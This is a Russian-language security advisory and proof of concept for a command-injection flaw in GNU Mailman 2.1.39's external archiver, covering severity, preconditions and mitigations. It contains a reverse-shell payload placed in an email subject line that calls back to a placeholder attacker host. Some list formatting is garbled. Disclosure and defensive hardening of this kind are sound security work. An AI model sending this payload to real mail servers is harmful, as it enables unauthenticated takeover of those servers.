
PoC и техническое описание для CVE-2025-43920, удаленной инъекции команд во внешнем архиваторе GNU Mailman 2.1.39, позволяющей неаутентифицированное выполнение кода через специально созданные темы писем.
Обнаружено: Firudin Davudzada & Musazada Aydan
Дата раскрытия: Апрель 2025
CVE ID: CVE-2025-43920
Серьёзность: 5.4 Средняя (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:N)
Тип атаки: Удалённая
Затрагиваемое ПО: GNU Mailman 2.1.39 (поставляется с cPanel/WHM)
GNU Mailman 2.1.39, поставляемый с cPanel и WHM, уязвим к критической ошибке внедрения команд, которая позволяет неаутентифицированным злоумышленникам выполнять произвольные команды операционной системы. Уязвимость возникает, когда внешний архиватор настроен с использованием PUBLIC_EXTERNAL_ARCHIVER или PRIVATE_EXTERNAL_ARCHIVER в конфигурационном файле mm_cfg.py, а тема письма содержит метасимволы оболочки, которые не очищаются должным образом. Это может привести к полной компрометации системы, позволяя злоумышленникам устанавливать обратные оболочки, извлекать данные или выполнять другие вредоносные действия.
PUBLIC_EXTERNAL_ARCHIVER, PRIVATE_EXTERNAL_ARCHIVER)Mailman/Handlers/ (логика обработки темы письма, потенциально включающая такие файлы, как CookHeaders.py);, &, |).Для эксплуатации этой уязвимости злоумышленник может отправить письмо в список рассылки, управляемый Mailman, с вредоносной темой, например:
Subject: ;bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1
Предварительные условия:
PUBLIC_EXTERNAL_ARCHIVER или PRIVATE_EXTERNAL_ARCHIVER.netcat) должен быть настроен на ATTACKERIP:4444 для получения обратной оболочки.Ожидаемый результат: Если команда внешнего архиватора не очищает тему письма, вредоносная команда выполняется на сервере, устанавливая обратную оболочку на сервер злоумышленника.
Отключение внешних архиваторов: Установите PUBLIC_EXTERNAL_ARCHIVER и PRIVATE_EXTERNAL_ARCHIVER в None в mm_cfg.py, чтобы отключить функциональность внешнего архиватора:
PUBLIC_EXTERNAL_ARCHIVER = None
PRIVATE_EXTERNAL_ARCHIVER = None
Очистка ввода: Если внешний архиватор необходим, убедитесь, что команда очищает тему письма для предотвращения внедрения метасимволов оболочки.
Ограничение подписок: Ограничьте подписки на список рассылки доверенными пользователями для уменьшения риска.
Firudin Davudzada и Musazada Aydan ответственно раскрыли эту уязвимость в ходе санкционированного тестирования на проникновение. Спасибо команде MITRE CVE за координацию.
Электронная почта: [email protected]\